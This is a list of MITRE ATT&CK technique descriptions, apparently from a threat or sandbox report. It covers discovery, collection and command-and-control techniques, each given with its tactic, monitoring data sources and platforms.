Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre